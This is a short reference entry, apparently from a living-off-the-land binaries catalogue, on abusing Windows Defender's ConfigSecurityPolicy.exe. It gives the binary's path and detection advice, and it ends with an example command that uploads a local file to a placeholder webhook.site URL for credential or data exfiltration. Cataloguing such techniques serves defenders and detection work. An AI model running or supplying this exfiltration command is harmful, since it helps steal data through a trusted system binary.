~/Privilege Escalation/Windows/Binaries# cat ConfigSecurityPolicy.exe.md

Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Paths:

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

Detection: ConfigSecurityPolicy storing data into alternate data streams. Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. User Agent is “MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)”

Upload

Upload file, credentials or data exfiltration in general

ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile